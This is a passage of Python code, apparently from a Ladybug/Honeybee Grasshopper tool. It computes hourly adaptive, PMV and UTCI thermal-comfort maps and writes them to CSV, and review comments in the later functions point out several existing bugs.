if mixedAirOverride[hour-1] == 0: pointAirTempValues = warpByHeight(pointAirTempValues, ptHeightWeights, flowVolValues, heatGainValues, adjacentList, adjacentNameList, groupedInletArea, groupedZoneHeights, groupedGlzHeights, groupedWinCeilDiffs, outdoorClac, prevailingOutdoorTemp)
pointAirTempValues = lb_preparation.flattenList(pointAirTempValues)
airTempMtx[count+1] = pointAirTempValues
#Compute the operative temperature.
pointOpTempValues = []
for ptCount, airTemp in enumerate(pointAirTempValues):
pointOpTempValues.append((airTemp+pointMRTValues[ptCount])/2)
operativeTempMtx[count+1] = pointOpTempValues
#Compute the wind speed.
pointWindSpeedValues = []
if outdoorClac == True:
for pointListCount, pointList in enumerate(testPtsViewFactor):
if pointListCount != len(testPtsViewFactor)-1:
for val in pointList:
windFlowVal = flowVolValues[pointListCount]/projectedAreas[pointListCount]
if allWindSpeedsSame == True: windFlowVal = windFlowVal + winSpeedNumbers[originalHour-1]
else:
windFlowVal = windFlowVal + winSpeedNumbers[pointListCount][originalHour-1]
pointWindSpeedValues.append(windFlowVal)
else:
for valCount, val in enumerate(pointList):
ptWindSpeed = lb_wind.calcWindSpeedBasedOnHeight(outWindSpeed[originalHour-1], outdoorPtHeightWeights[valCount], d, a, 270, 0.14)
pointWindSpeedValues.append(ptWindSpeed)
else:
for pointListCount, pointList in enumerate(testPtsViewFactor):
for val in pointList:
windFlowVal = flowVolValues[pointListCount]/projectedAreas[pointListCount]
if allWindSpeedsSame == True: windFlowVal = windFlowVal + winSpeedNumbers[originalHour-1]
else: windFlowVal = windFlowVal + winSpeedNumbers[pointListCount][originalHour-1]
pointWindSpeedValues.append(windFlowVal)
#Compute the adaptive comfort and deg from target.
adaptComfPointValues = []
degFromTargetPointValues = []
for ptCount, airTemp in enumerate(pointAirTempValues):
if ASHRAEorEN == True: comfTemp, distFromTarget, lowTemp, upTemp, comf, condition = lb_comfortModels.comfAdaptiveComfortASH55(airTemp, pointMRTValues[ptCount], prevailTemp[originalHour-1], pointWindSpeedValues[ptCount], comfClass, levelOfConditioning)
else: comfTemp, distFromTarget, lowTemp, upTemp, comf, condition = lb_comfortModels.comfAdaptiveComfortEN15251(airTemp, pointMRTValues[ptCount], prevailTemp[originalHour-1], pointWindSpeedValues[ptCount], comfClass, levelOfConditioning)
adaptComfPointValues.append(int(comf))
degFromTargetPointValues.append(distFromTarget)
adaptComfMtx[count+1] = adaptComfPointValues
degFromTargetMtx[count+1] = degFromTargetPointValues
#Run through every hour of the analysis to fill up the matrices.
if parallel_ == True and len(HOYs) != 1:
tasks.Parallel.ForEach(range(len(HOYs)), climateMap)
else:
for hour in range(len(HOYs)):
#Ability to cancel with Esc
#if gh.GH_Document.IsEscapeKeyDown(): assert False
climateMap(hour)
except:
print "The calculation has been terminated by the user!"
e = gh.GH_RuntimeMessageLevel.Warning
ghenv.Component.AddRuntimeMessage(e, "The calculation has been terminated by the user!")
calcCancelled = True
if calcCancelled == False:
return radTempMtx, airTempMtx, operativeTempMtx, adaptComfMtx, degFromTargetMtx
else:
return -1
def mainPMV(HOYs, analysisPeriod, srfTempNumbers, srfTempHeaders, airTempDataNumbers, airTempDataHeaders, flowVolDataHeaders, flowVolDataNumbers, heatGainDataHeaders, heatGainDataNumbers, relHumidDataHeaders, relHumidDataNumbers, clothingLevel, metabolicRate, zoneSrfNames, testPtsViewFactor, viewFactorMesh, latitude, longitude, timeZone, diffSolarRad, directSolarRad, globHorizRad, testPtSkyView, testPtBlockedVec, numSkyPatchDivs, winTrans, cloA, floorR, testPtZoneNames, testPtZoneWeights, ptHeightWeights, zoneInletInfo, inletHeightOverride, PPDComfortThresh, humidRatioUp, humidRatioLow, mixedAirOverride, zoneHasWindows, outdoorClac, outSrfTempHeaders, outSrfTempNumbers, outdoorNonSrfViewFac, outDryBulbTemp, outRelHumid, outWindSpeed, d, a, outdoorPtHeightWeights, allWindowShadesSame, winStatusHeaders, testPtBlockName, zoneWindowTransmiss, zoneWindowNames, allWindSpeedsSame, winSpeedNumbers, dataAnalysisPeriod, lb_preparation, lb_sunpath, lb_comfortModels, lb_wind):
#Set up matrices to be filled.
radTempMtx = ['Radiant Temperature;' + str(analysisPeriod[0]) + ";" + str(analysisPeriod[1])]
airTempMtx = ['Air Temperature;' + str(analysisPeriod[0]) + ";" + str(analysisPeriod[1])]
SET_Mtx = ['Standard Effective Temperature;' + str(analysisPeriod[0]) + ";" + str(analysisPeriod[1])]
PMVComfMtx = ['PMV Thermal Comfort Percent;' + str(analysisPeriod[0]) + ";" + str(analysisPeriod[1])]
PMV_Mtx = ['Predicted Mean Vote;' + str(analysisPeriod[0]) + ";" + str(analysisPeriod[1])]
#Check the data anlysis period and subtract the start day from each of the HOYs.
originalHOYs = []
if dataAnalysisPeriod != [(1,1,1),(12,31,24)]:
FinalHOYs, mon, days = lb_preparation.getHOYsBasedOnPeriod(dataAnalysisPeriod, 1)
for hCount, hour in enumerate(HOYs):
originalHOYs.append(hour)
HOYs[hCount] = hour - FinalHOYs[0]
else: originalHOYs = HOYs
#Check to be sure that the requested analysis period and the analysis period of the connected data align.
periodsAlign = True
for hour in HOYs:
if hour < 0: periodsAlign = False
try: srfTempNumbers[0][hour-1]
except: periodsAlign = False
if periodsAlign == False:
warning = 'The analysis period of the energy simulation data and the analysisPeriodOrHOY_ plugged into this component do not align.'
print warning
ghenv.Component.AddRuntimeMessage(w, warning)
return -1
else:
#Create placeholders for all of the hours.
for hour in HOYs:
radTempMtx.append(0)
airTempMtx.append(0)
SET_Mtx.append(0)
PMVComfMtx.append(0)
PMV_Mtx.append(0)
#Make sure that the EPW Data does not include headers.
outDryBulbTemp = outDryBulbTemp[7:]
outRelHumid = outRelHumid[7:]
outWindSpeed = outWindSpeed[7:]
#Make a dictionary that will relate the zoneSrfNames to the srfTempValues.
srfTempDict = createSrfDict(zoneSrfNames, "srfName", "srfTemp", srfTempHeaders, srfTempNumbers)
#Make a dictionary for outdoor srfNames and temperatures.
if outdoorClac == True:
outSrfTempDict = createSrfDict(zoneSrfNames, "srfName", "srfTemp", outSrfTempHeaders, outSrfTempNumbers)
else: outSrfTempDict = {}
#If there are different shade statuses for the different windows, make a neutral winTrans list for this case.
neutralWinTransList = []
winShdDict = {}
if allWindowShadesSame == False:
for hr in range(8760): neutralWinTransList.append(1)
winShdDict = createShdDict(winStatusHeaders, winTrans, zoneWindowTransmiss, zoneWindowNames)
#Make sure that there are windows in the model and a good reason to generate solar outputs.
if sum(zoneHasWindows) != 0:
#Create a meshed sky dome to assist with direct sunlight falling on occupants.
skyPatches = lb_preparation.generateSkyGeo(rc.Geometry.Point3d.Origin, numSkyPatchDivs, .5)
skyPatchMeshes = []
for patch in skyPatches:
skyPatchMeshes.append(rc.Geometry.Mesh.CreateFromBrep(patch, rc.Geometry.MeshingParameters.Coarse)[0])
#Initiate the sun vector calculator.
lb_sunpath.initTheClass(float(latitude), 0.0, rc.Geometry.Point3d.Origin, 100, float(longitude), float(timeZone))
#Calculate the altitude and azimuth of the different hours.
sunVecs = []
altitudes = []
azimuths = []
for hour in originalHOYs:
d, m, t = lb_preparation.hour2Date(hour, True)
lb_sunpath.solInitOutput(m+1, d, t)
altitude = math.degrees(lb_sunpath.solAlt)
azimuth = math.degrees(lb_sunpath.solAz)
if altitude > 0:
sunVec = lb_sunpath.sunReverseVectorCalc()
else: sunVec = None
sunVecs.append(sunVec)
altitudes.append(altitude)
azimuths.append(azimuth)
sunVecInfo = [sunVecs, altitudes, azimuths]
#Make a dictionary that will relate the testPtZoneNames to the air temperatures.
airTempDict = createZoneDict(testPtZoneNames, "zoneName", "airTemp", airTempDataHeaders, airTempDataNumbers)
relHumidDict = createZoneDict(testPtZoneNames, "zoneName", "airTemp", relHumidDataHeaders, relHumidDataNumbers)
#Compute grouped zone properties for air stratification purposes.
adjacentList, adjacentNameList, groupedInletArea, groupedZoneHeights, groupedGlzHeights, groupedWinCeilDiffs, groupedZoneVols = computeGroupedRoomProperties(testPtZoneWeights, testPtZoneNames, zoneInletInfo, inletHeightOverride)
#Compute a generalizable "projected area" to estimate the zone's starting wind speed.
#Note that this projection should ideally be done perpendicularly to the direction of air flow but, since we don't really know the direction of air flow in the zone, we will compute it generally over the whole volume.
projectedAreas = []
for zoneVol in groupedZoneVols:
projLen = math.pow(zoneVol, 1/3)
projArea = projLen*projLen
projectedAreas.append(projArea)
#Run through every hour of the analysis to fill up the matrices.
calcCancelled = False
try:
def climateMapPMV(count):
#Ability to cancel with Esc
if gh.GH_Document.IsEscapeKeyDown(): assert False
# Get the hour.
hour = HOYs[count]
originalHour = originalHOYs[count]
#Select out the relevant air and surface temperatures.
flowVolValues = []
heatGainValues = []
for zoneVal in flowVolDataNumbers: flowVolValues.append(zoneVal[hour-1])
for zoneVal in heatGainDataNumbers: heatGainValues.append(zoneVal[hour-1])
#Compute the radiant temperature.
pointMRTValues = calculatePointMRT(srfTempDict, testPtsViewFactor, hour-1, originalHour-1, outdoorClac, outSrfTempDict, outdoorNonSrfViewFac, outDryBulbTemp)
if sum(zoneHasWindows) != 0:
if allWindowShadesSame == True: pointMRTValues = calculateSolarAdjustedMRT(pointMRTValues, hour, originalHour, diffSolarRad, directSolarRad, globHorizRad, count, sunVecInfo, testPtSkyView, testPtBlockedVec, winTrans, cloA, floorR, skyPatchMeshes, zoneHasWindows, outdoorClac, lb_comfortModels)
else:
#To factor in the effect of blocked sunlight, I have to re-make the testPtSkyView and the testPtBlockedVec to reflect the conditions for the given hour.
hourTestPtSkyView, hourTestPtBlockedVec = computeHourShadeDrawing(hour, testPtSkyView, testPtBlockedVec, winShdDict, testPtBlockName, outdoorClac)
pointMRTValues = calculateSolarAdjustedMRT(pointMRTValues, hour, originalHour, diffSolarRad, directSolarRad, globHorizRad, count, sunVecInfo, hourTestPtSkyView, hourTestPtBlockedVec, neutralWinTransList, cloA, floorR, skyPatchMeshes, zoneHasWindows, outdoorClac, lb_comfortModels)
pointMRTValues = lb_preparation.flattenList(pointMRTValues)
radTempMtx[count+1] = pointMRTValues
#Compute the air temperature.
pointAirTempValues = getAirPointValue(airTempDict, testPtZoneWeights, testPtsViewFactor, hour-1, originalHour-1, outdoorClac, outDryBulbTemp)
if mixedAirOverride[hour-1] == 0: pointAirTempValues = warpByHeight(pointAirTempValues, ptHeightWeights, flowVolValues, heatGainValues, adjacentList, adjacentNameList, groupedInletArea, groupedZoneHeights, groupedGlzHeights, groupedWinCeilDiffs, outdoorClac, outDryBulbTemp)
pointAirTempValues = lb_preparation.flattenList(pointAirTempValues)
airTempMtx[count+1] = pointAirTempValues
#Compute the relative humidity.
pointRelHumidValues = getAirPointValue(relHumidDict, testPtZoneWeights, testPtsViewFactor, hour-1, originalHour-1, outdoorClac, outRelHumid)
pointRelHumidValues = lb_preparation.flattenList(pointRelHumidValues)
#Compute the wind speed.
pointWindSpeedValues = []
if outdoorClac == True:
for pointListCount, pointList in enumerate(testPtsViewFactor):
if pointListCount != len(testPtsViewFactor)-1:
for val in pointList:
windFlowVal = flowVolValues[pointListCount]/projectedAreas[pointListCount]
if allWindSpeedsSame == True: windFlowVal = windFlowVal + winSpeedNumbers[originalHour-1]
else:
windFlowVal = windFlowVal + winSpeedNumbers[pointListCount][originalHour-1]
pointWindSpeedValues.append(windFlowVal)
else:
for valCount, val in enumerate(pointList):
ptWindSpeed = lb_wind.calcWindSpeedBasedOnHeight(outWindSpeed[originalHour-1], outdoorPtHeightWeights[valCount], d, a, 270, 0.14)
pointWindSpeedValues.append(ptWindSpeed)
else:
for pointListCount, pointList in enumerate(testPtsViewFactor):
for val in pointList:
windFlowVal = flowVolValues[pointListCount]/projectedAreas[pointListCount]
if allWindSpeedsSame == True: windFlowVal = windFlowVal + winSpeedNumbers[originalHour-1]
else: windFlowVal = windFlowVal + winSpeedNumbers[pointListCount][originalHour-1]
pointWindSpeedValues.append(windFlowVal)
#Compute the SET and PMV comfort.
setPointValues = []
pmvComfPointValues = []
pmvPointValues = []
for ptCount, airTemp in enumerate(pointAirTempValues):
try:
pmv, ppd, set, taAdj, coolingEffect = lb_comfortModels.comfPMVElevatedAirspeed(airTemp, pointMRTValues[ptCount], pointWindSpeedValues[ptCount], pointRelHumidValues[ptCount], metabolicRate[originalHour-1], clothingLevel[originalHour-1], 0.0)
except:
print 'These conditions caused a failure of the PMV model convergence: Ta = ' + str(airTemp) + "; Tr = " + str(pointMRTValues[ptCount]) + "; Vel = " + str(pointWindSpeedValues[ptCount]) + "; RH = " + str(pointRelHumidValues[ptCount]) + "; met = " + str(metabolicRate[originalHour-1]) + "; clo= " + str(clothingLevel[originalHour-1])
pmv, ppd, set, taAdj, coolingEffect = 0.0, 5.0, 21.0, 0.0, 0.0
setPointValues.append(set)
if humidRatioUp != 0.03 or humidRatioLow != 0.0:
HR, EN, vapPress, satPress = lb_comfortModels.calcHumidRatio(airTemp, pointRelHumidValues[ptCount], 101325)
if ppd < PPDComfortThresh and HR < humidRatioUp and HR > humidRatioLow: comfortableOrNot.append(1)
else: comfortableOrNot.append(0)
else:
if ppd < PPDComfortThresh: pmvComfPointValues.append(1)
else: pmvComfPointValues.append(0)
pmvPointValues.append(pmv)
SET_Mtx[count+1] = setPointValues
PMVComfMtx[count+1] = pmvComfPointValues
PMV_Mtx[count+1] = pmvPointValues
#Run through every hour of the analysis to fill up the matrices.
if parallel_ == True and len(HOYs) != 1:
tasks.Parallel.ForEach(range(len(HOYs)), climateMapPMV)
else:
for hour in range(len(HOYs)):
#Ability to cancel with Esc
if gh.GH_Document.IsEscapeKeyDown(): assert False
climateMapPMV(hour)
except:
print "The calculation has been terminated by the user!"
e = gh.GH_RuntimeMessageLevel.Warning
ghenv.Component.AddRuntimeMessage(e, "The calculation has been terminated by the user!")
calcCancelled = True
if calcCancelled == False:
return radTempMtx, airTempMtx, SET_Mtx, PMVComfMtx, PMV_Mtx
else:
return -1
def mainUTCI(HOYs, analysisPeriod, srfTempNumbers, srfTempHeaders, airTempDataNumbers, airTempDataHeaders, flowVolDataHeaders, flowVolDataNumbers, heatGainDataHeaders, heatGainDataNumbers, relHumidDataHeaders, relHumidDataNumbers, zoneSrfNames, testPtsViewFactor, viewFactorMesh, latitude, longitude, timeZone, diffSolarRad, directSolarRad, globHorizRad, testPtSkyView, testPtBlockedVec, numSkyPatchDivs, winTrans, cloA, floorR, testPtZoneNames, testPtZoneWeights, ptHeightWeights, zoneInletInfo, inletHeightOverride, mixedAirOverride, zoneHasWindows, outdoorClac, outSrfTempHeaders, outSrfTempNumbers, outdoorNonSrfViewFac, outDryBulbTemp, outRelHumid, outWindSpeed, d, a, outdoorPtHeightWeights, allWindowShadesSame, winStatusHeaders, testPtBlockName, zoneWindowTransmiss, zoneWindowNames, allWindSpeedsSame, winSpeedNumbers, dataAnalysisPeriod, lb_preparation, lb_sunpath, lb_comfortModels, lb_wind):
    """Run the hour-by-hour UTCI comfort mapping for all test points.

    Mirrors mainPMV but evaluates lb_comfortModels.comfUTCI per point and
    hour, producing radiant/air temperature matrices plus UTCI, outdoor
    comfort (0/1) and degrees-from-neutral (UTCI - 20) matrices.

    Returns:
        (radTempMtx, airTempMtx, UTCI_Mtx, OutdoorComfMtx, DegFromNeutralMtx)
        on success; -1 if the analysis periods do not align.

    NOTE(review): unlike mainPMV, the try/except around the hourly loop is
    commented out below, so calcCancelled can never become True and pressing
    Esc raises an uncaught AssertionError instead of a clean cancel — confirm
    whether this was left disabled deliberately for debugging.
    """
    #Set up matrices to be filled.  Index 0 holds a CSV-style header string.
    radTempMtx = ['Radiant Temperature;' + str(analysisPeriod[0]) + ";" + str(analysisPeriod[1])]
    airTempMtx = ['Air Temperature;' + str(analysisPeriod[0]) + ";" + str(analysisPeriod[1])]
    UTCI_Mtx = ['Universal Thermal Climate Index;' + str(analysisPeriod[0]) + ";" + str(analysisPeriod[1])]
    OutdoorComfMtx = ['Outdoor Thermal Comfort Percent;' + str(analysisPeriod[0]) + ";" + str(analysisPeriod[1])]
    DegFromNeutralMtx = ['Degrees From Neutral UTCI;' + str(analysisPeriod[0]) + ";" + str(analysisPeriod[1])]
    #Check the data analysis period and subtract the start day from each of the HOYs
    #so that HOYs index into the (possibly shorter) connected data arrays.
    originalHOYs = []
    if dataAnalysisPeriod != [(1,1,1),(12,31,24)]:
        FinalHOYs, mon, days = lb_preparation.getHOYsBasedOnPeriod(dataAnalysisPeriod, 1)
        for hCount, hour in enumerate(HOYs):
            originalHOYs.append(hour)
            HOYs[hCount] = hour - FinalHOYs[0]
    else: originalHOYs = HOYs
    #Check to be sure that the requested analysis period and the analysis period of the connected data align.
    periodsAlign = True
    for hour in HOYs:
        if hour < 0: periodsAlign = False
        if outdoorClac == True:
            try: outSrfTempNumbers[0][hour-1]
            except: periodsAlign = False
        else:
            try: srfTempNumbers[0][hour-1]
            except: periodsAlign = False
    if periodsAlign == False:
        warning = 'The analysis period of the energy simulation data and the analysisPeriodOrHOY_ plugged into this component do not align.'
        print warning
        ghenv.Component.AddRuntimeMessage(w, warning)
        return -1
    else:
        #Create placeholders for all of the hours (filled in by index below).
        for hour in HOYs:
            radTempMtx.append(0)
            airTempMtx.append(0)
            UTCI_Mtx.append(0)
            OutdoorComfMtx.append(0)
            DegFromNeutralMtx.append(0)
        #Make sure that the EPW Data does not include headers (first 7 items).
        outDryBulbTemp = outDryBulbTemp[7:]
        outRelHumid = outRelHumid[7:]
        outWindSpeed = outWindSpeed[7:]
        #Change the outdoor point heights to be for 10 meters above in order to correctly account for wind speeds.
        newOutdoorPtHeightWeights = []
        for height in outdoorPtHeightWeights:
            newOutdoorPtHeightWeights.append(height+10)
        #Make a dictionary that will relate the zoneSrfNames to the srfTempValues.
        try: srfTempDict = createSrfDict(zoneSrfNames, "srfName", "srfTemp", srfTempHeaders, srfTempNumbers)
        except: srfTempDict = {}
        #Make a dictionary for outdoor srfNames and temperatures.
        if outdoorClac == True: outSrfTempDict = createSrfDict(zoneSrfNames, "srfName", "srfTemp", outSrfTempHeaders, outSrfTempNumbers)
        else: outSrfTempDict = {}
        #If there are different shade statuses for the different windows, make a neutral winTrans list for this case.
        neutralWinTransList = []
        winShdDict = {}
        if allWindowShadesSame == False:
            for hr in range(8760): neutralWinTransList.append(1)
            winShdDict = createShdDict(winStatusHeaders, winTrans, zoneWindowTransmiss, zoneWindowNames)
        #Make sure that there are windows in the model and a good reason to generate solar outputs.
        if sum(zoneHasWindows) != 0:
            #Create a meshed sky dome to assist with direct sunlight falling on occupants.
            skyPatches = lb_preparation.generateSkyGeo(rc.Geometry.Point3d.Origin, numSkyPatchDivs, .5)
            skyPatchMeshes = []
            for patch in skyPatches:
                skyPatchMeshes.append(rc.Geometry.Mesh.CreateFromBrep(patch, rc.Geometry.MeshingParameters.Coarse)[0])
            #Initiate the sun vector calculator.
            lb_sunpath.initTheClass(float(latitude), 0.0, rc.Geometry.Point3d.Origin, 100, float(longitude), float(timeZone))
            #Calculate the altitude and azimuth of the different hours.
            sunVecs = []
            altitudes = []
            azimuths = []
            for hour in originalHOYs:
                #NOTE(review): this reassigns the parameter `d`, which is also the
                #wind-profile parameter passed to calcWindSpeedBasedOnHeight below —
                #confirm whether the clobbering is intended.
                d, m, t = lb_preparation.hour2Date(hour, True)
                lb_sunpath.solInitOutput(m+1, d, t)
                altitude = math.degrees(lb_sunpath.solAlt)
                azimuth = math.degrees(lb_sunpath.solAz)
                if altitude > 0:
                    sunVec = lb_sunpath.sunReverseVectorCalc()
                else: sunVec = None
                sunVecs.append(sunVec)
                altitudes.append(altitude)
                azimuths.append(azimuth)
            sunVecInfo = [sunVecs, altitudes, azimuths]
        #Make a dictionary that will relate the testPtZoneNames to the air temperatures (and one for relative humidity).
        try: airTempDict = createZoneDict(testPtZoneNames, "zoneName", "airTemp", airTempDataHeaders, airTempDataNumbers)
        except: airTempDict = {}
        try: relHumidDict = createZoneDict(testPtZoneNames, "zoneName", "airTemp", relHumidDataHeaders, relHumidDataNumbers)
        except: relHumidDict = {}
        #Compute grouped zone properties for air stratification purposes.
        adjacentList, adjacentNameList, groupedInletArea, groupedZoneHeights, groupedGlzHeights, groupedWinCeilDiffs, groupedZoneVols = computeGroupedRoomProperties(testPtZoneWeights, testPtZoneNames, zoneInletInfo, inletHeightOverride)
        #Compute a generalizable "projected area" to estimate the zone's starting wind speed.
        #Note that this projection should ideally be done perpendicularly to the direction of air flow but, since we don't really know the direction of air flow in the zone, we will compute it generally over the whole volume.
        projectedAreas = []
        for zoneVol in groupedZoneVols:
            #NOTE(review): 1/3 is integer division under Python 2 (== 0), so projLen
            #is always 1.0 — confirm whether 1.0/3.0 (cube root) was intended.
            projLen = math.pow(zoneVol, 1/3)
            projArea = projLen*projLen
            projectedAreas.append(projArea)
        #Run through every hour of the analysis to fill up the matrices.
        calcCancelled = False
        #try:
        def climateMapUTCI(count):
            #Fills matrix row count+1 with per-point values for HOYs[count].
            #Ability to cancel with Esc
            if gh.GH_Document.IsEscapeKeyDown(): assert False
            # Get the hour.
            hour = HOYs[count]
            originalHour = originalHOYs[count]
            #Select out the relevant air flow volumes and heat gains.
            flowVolValues = []
            heatGainValues = []
            for zoneVal in flowVolDataNumbers: flowVolValues.append(zoneVal[hour-1])
            for zoneVal in heatGainDataNumbers: heatGainValues.append(zoneVal[hour-1])
            #Compute the radiant temperature.
            pointMRTValues = calculatePointMRT(srfTempDict, testPtsViewFactor, hour-1, originalHour-1, outdoorClac, outSrfTempDict, outdoorNonSrfViewFac, outDryBulbTemp)
            if sum(zoneHasWindows) != 0:
                if allWindowShadesSame == True: pointMRTValues = calculateSolarAdjustedMRT(pointMRTValues, hour, originalHour, diffSolarRad, directSolarRad, globHorizRad, count, sunVecInfo, testPtSkyView, testPtBlockedVec, winTrans, cloA, floorR, skyPatchMeshes, zoneHasWindows, outdoorClac, lb_comfortModels)
                else:
                    #To factor in the effect of blocked sunlight, I have to re-make the testPtSkyView and the testPtBlockedVec to reflect the conditions for the given hour.
                    hourTestPtSkyView, hourTestPtBlockedVec = computeHourShadeDrawing(hour, testPtSkyView, testPtBlockedVec, winShdDict, testPtBlockName, outdoorClac)
                    pointMRTValues = calculateSolarAdjustedMRT(pointMRTValues, hour, originalHour, diffSolarRad, directSolarRad, globHorizRad, count, sunVecInfo, hourTestPtSkyView, hourTestPtBlockedVec, neutralWinTransList, cloA, floorR, skyPatchMeshes, zoneHasWindows, outdoorClac, lb_comfortModels)
            pointMRTValues = lb_preparation.flattenList(pointMRTValues)
            radTempMtx[count+1] = pointMRTValues
            #Compute the air temperature (stratified by height unless the hour is flagged as well-mixed).
            pointAirTempValues = getAirPointValue(airTempDict, testPtZoneWeights, testPtsViewFactor, hour-1, originalHour-1, outdoorClac, outDryBulbTemp)
            if mixedAirOverride[hour-1] == 0: pointAirTempValues = warpByHeight(pointAirTempValues, ptHeightWeights, flowVolValues, heatGainValues, adjacentList, adjacentNameList, groupedInletArea, groupedZoneHeights, groupedGlzHeights, groupedWinCeilDiffs, outdoorClac, outDryBulbTemp)
            pointAirTempValues = lb_preparation.flattenList(pointAirTempValues)
            airTempMtx[count+1] = pointAirTempValues
            #Compute the relative humidity.
            pointRelHumidValues = getAirPointValue(relHumidDict, testPtZoneWeights, testPtsViewFactor, hour-1, originalHour-1, outdoorClac, outRelHumid)
            pointRelHumidValues = lb_preparation.flattenList(pointRelHumidValues)
            #Compute the wind speed.  The last testPtsViewFactor group is the outdoor one
            #(log-profile from EPW wind at +10 m); indoor groups use flow volume / projected area.
            pointWindSpeedValues = []
            if outdoorClac == True:
                for pointListCount, pointList in enumerate(testPtsViewFactor):
                    if pointListCount != len(testPtsViewFactor)-1:
                        for val in pointList:
                            windFlowVal = flowVolValues[pointListCount]/projectedAreas[pointListCount]
                            if allWindSpeedsSame == True: windFlowVal = windFlowVal + winSpeedNumbers[originalHour-1]
                            else:
                                windFlowVal = windFlowVal + winSpeedNumbers[pointListCount][originalHour-1]
                            pointWindSpeedValues.append(windFlowVal)
                    else:
                        for valCount, val in enumerate(pointList):
                            ptWindSpeed = lb_wind.calcWindSpeedBasedOnHeight(outWindSpeed[originalHour-1], newOutdoorPtHeightWeights[valCount], d, a, 270, 0.14)
                            pointWindSpeedValues.append(ptWindSpeed)
            else:
                for pointListCount, pointList in enumerate(testPtsViewFactor):
                    for val in pointList:
                        windFlowVal = flowVolValues[pointListCount]/projectedAreas[pointListCount]
                        if allWindSpeedsSame == True: windFlowVal = windFlowVal + winSpeedNumbers[originalHour-1]
                        else: windFlowVal = windFlowVal + winSpeedNumbers[pointListCount][originalHour-1]
                        pointWindSpeedValues.append(windFlowVal)
            #Compute the UTCI comfort metrics (comfort flag and degrees from the 20C neutral point).
            utciPointValues = []
            outdoorComfPointValues = []
            degNeutralPointValues = []
            for ptCount, airTemp in enumerate(pointAirTempValues):
                utci, comf, condition, stressVal = lb_comfortModels.comfUTCI(airTemp, pointMRTValues[ptCount], pointWindSpeedValues[ptCount], pointRelHumidValues[ptCount])
                utciPointValues.append(utci)
                outdoorComfPointValues.append(comf)
                degNeutralPointValues.append(utci-20)
            UTCI_Mtx[count+1] = utciPointValues
            OutdoorComfMtx[count+1] = outdoorComfPointValues
            DegFromNeutralMtx[count+1] = degNeutralPointValues
        #Run through every hour of the analysis to fill up the matrices.
        if parallel_ == True and len(HOYs) != 1:
            tasks.Parallel.ForEach(range(len(HOYs)), climateMapUTCI)
        else:
            for hour in range(len(HOYs)):
                #Ability to cancel with Esc
                if gh.GH_Document.IsEscapeKeyDown(): assert False
                climateMapUTCI(hour)
    #NOTE(review): the handler below is disabled, so the Esc assert above
    #propagates and calcCancelled always stays False.
    #except:
    #    print "The calculation has been terminated by the user!"
    #    e = gh.GH_RuntimeMessageLevel.Warning
    #    ghenv.Component.AddRuntimeMessage(e, "The calculation has been terminated by the user!")
    #    calcCancelled = True
    if calcCancelled == False:
        return radTempMtx, airTempMtx, UTCI_Mtx, OutdoorComfMtx, DegFromNeutralMtx
    else:
        return -1
def writeCSVAdapt(lb_preparation, directory, fileName, radTempMtx, airTempMtx, operativeTempMtx, adaptComfMtx, degFromTargetMtx):
    """Write the adaptive-comfort result matrices to CSV files.

    Each matrix is a list whose first item is a header string and whose
    remaining items are per-hour lists of per-point values.  The radiant,
    air and operative temperature files are skipped (result path = None)
    when the module-level writeResultFile_ input is 2; the comfort and
    degrees-from-target files are always written.

    Returns:
        (radTempResult, airTempResult, operativeTempResult,
         adaptComfResult, degFromTargetResult) — full file paths, with
        None for any file that was skipped.
    """
    #Find out the number of values in each hour (index of the last column).
    valLen = len(radTempMtx[-1])-1
    #Set up a working directory.
    workingDir = lb_preparation.makeWorkingDir(os.path.join(directory))
    def _writeMtx(mtx, csvFileName):
        #Write one matrix to workingDir/csvFileName and return the full path.
        #Row 0 is the header string; data rows are comma-joined with a
        #trailing newline after the last column.
        filePath = os.path.join(workingDir, csvFileName)
        csvFile = open(filePath, 'wb')
        for lineCount, line in enumerate(mtx):
            if lineCount != 0:
                lineStr = ''
                for valCt, val in enumerate(line):
                    if valCt != valLen: lineStr = lineStr + str(val) + ','
                    else: lineStr = lineStr + str(val) + "\n"
                csvFile.write(lineStr)
            else: csvFile.write(line + "\n")
        csvFile.close()
        return filePath
    #Write the temperature files unless the user asked for comfort results only.
    if writeResultFile_ != 2:
        radTempResult = _writeMtx(radTempMtx, fileName + "RadiantTemp.csv")
        airTempResult = _writeMtx(airTempMtx, fileName + "AirTemp.csv")
        operativeTempResult = _writeMtx(operativeTempMtx, fileName + "OperativeTemp.csv")
    else:
        radTempResult = None
        airTempResult = None
        operativeTempResult = None
    #The comfort and degrees-from-target files are always written.
    adaptComfResult = _writeMtx(adaptComfMtx, fileName + "AdaptComf.csv")
    degFromTargetResult = _writeMtx(degFromTargetMtx, fileName + "DegFromTarget.csv")
    return radTempResult, airTempResult, operativeTempResult, adaptComfResult, degFromTargetResult
def writeCSVPMV(lb_preparation, directory, fileName, radTempMtx, airTempMtx, SET_Mtx, PMVComfMtx, PMV_Mtx):
    """Write the PMV comfort result matrices to CSV files.

    Each matrix is a list whose first item is a header string and whose
    remaining items are per-hour lists of per-point values.  The radiant,
    air and SET files are skipped (result path = None) when the
    module-level writeResultFile_ input is 2; the PMV-comfort (PPD.csv)
    and PMV files are always written.

    Returns:
        (radTempResult, airTempResult, SET_Result, PPD_Result, PMV_Result)
        — full file paths, with None for any file that was skipped.
    """
    #Find out the number of values in each hour (index of the last column).
    valLen = len(radTempMtx[-1])-1
    #Set up a working directory.
    workingDir = lb_preparation.makeWorkingDir(os.path.join(directory))
    def _writeMtx(mtx, csvFileName):
        #Write one matrix to workingDir/csvFileName and return the full path.
        #Row 0 is the header string; data rows are comma-joined with a
        #trailing newline after the last column.
        filePath = os.path.join(workingDir, csvFileName)
        csvFile = open(filePath, 'wb')
        for lineCount, line in enumerate(mtx):
            if lineCount != 0:
                lineStr = ''
                for valCt, val in enumerate(line):
                    if valCt != valLen: lineStr = lineStr + str(val) + ','
                    else: lineStr = lineStr + str(val) + "\n"
                csvFile.write(lineStr)
            else: csvFile.write(line + "\n")
        csvFile.close()
        return filePath
    #Write the temperature/SET files unless the user asked for comfort results only.
    if writeResultFile_ != 2:
        radTempResult = _writeMtx(radTempMtx, fileName + "RadiantTemp.csv")
        airTempResult = _writeMtx(airTempMtx, fileName + "AirTemp.csv")
        SET_Result = _writeMtx(SET_Mtx, fileName + "SET.csv")
    else:
        radTempResult = None
        airTempResult = None
        SET_Result = None
    #The comfort-flag (PPD.csv) and PMV files are always written.
    PPD_Result = _writeMtx(PMVComfMtx, fileName + "PPD.csv")
    PMV_Result = _writeMtx(PMV_Mtx, fileName + "PMV.csv")
    return radTempResult, airTempResult, SET_Result, PPD_Result, PMV_Result
